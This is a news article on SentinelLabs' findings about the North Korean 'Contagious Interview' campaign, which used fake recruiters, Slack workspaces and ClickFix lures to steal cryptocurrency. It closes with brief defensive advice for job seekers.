A new campaign by North Korean state-backed hackers has compromised hundreds of professionals by impersonating recruiters on platforms like Slack.
Between March and June 2025, cybersecurity researchers identified a widespread cyber campaign led by North Korean threat actors posing as recruiters or job seekers. The attackers primarily targeted individuals in the blockchain, finance, healthcare, and marketing sectors, with the intent to steal cryptocurrency. SentinelLabs reported that at least 230 victims were identified through exposed server logs, though the actual number is believed to be much higher.
The campaign, dubbed 'Contagious Interview,' is an extension of tactics first seen in 2023 and attributed to the Lazarus Group. It uses social engineering, including fake job offers and phony skill assessments, to trick victims into executing malware, often through a technique known as 'ClickFix,' where fake CAPTCHA tests or error messages prompt users to run malicious scripts.
Once compromised, the hackers can exfiltrate sensitive data or gain access to digital assets. The infrastructure supporting these operations includes fake recruitment websites, compromised Slack workspaces, and tools that monitor for detection using threat intelligence platforms.
SentinelLabs uncovered multiple indicators of poor operational security (OPSEC), including exposed web directories and internal files. These lapses allowed researchers to disrupt portions of the infrastructure and link the campaign to North Korea’s broader efforts to evade sanctions and generate funding through illicit cyber activity.
SentinelLabs stated that North Korean hackers actively monitor Cyber Threat Intelligence (CTI) feeds to evaluate their own risk of detection. Tools like Validin, VirusTotal, and Maltrail were used to monitor flagged infrastructure and identify new targets. Once a domain or malware strain was detected, the threat actors often abandoned the infrastructure and quickly deployed replacements, rather than modifying or hardening existing systems.
Researchers observed coordinated activity through Slack, including bot-based URL sharing among hacker teams. Despite access to advanced tools, the attackers did not apply systematic improvements to their methods, possibly due to revenue quotas and decentralization within the regime’s cyber units.
These sectors often involve direct access to crypto wallets or sensitive financial data, making individuals attractive targets for theft and extortion.
ClickFix is a technique where users are tricked into copying and pasting malicious code, often under the guise of fixing a fake error or completing a CAPTCHA test.
Hackers use platforms like Validin and VirusTotal to monitor their infrastructure, check if domains are flagged, and adjust operations accordingly.
Due to pressure from revenue quotas, teams prioritize speed and output over long-term stealth, often abandoning old infrastructure rather than updating it.
Verify the authenticity of job offers, avoid running code or downloading files from unverified sources, and be cautious of recruitment processes that deviate from standard practices.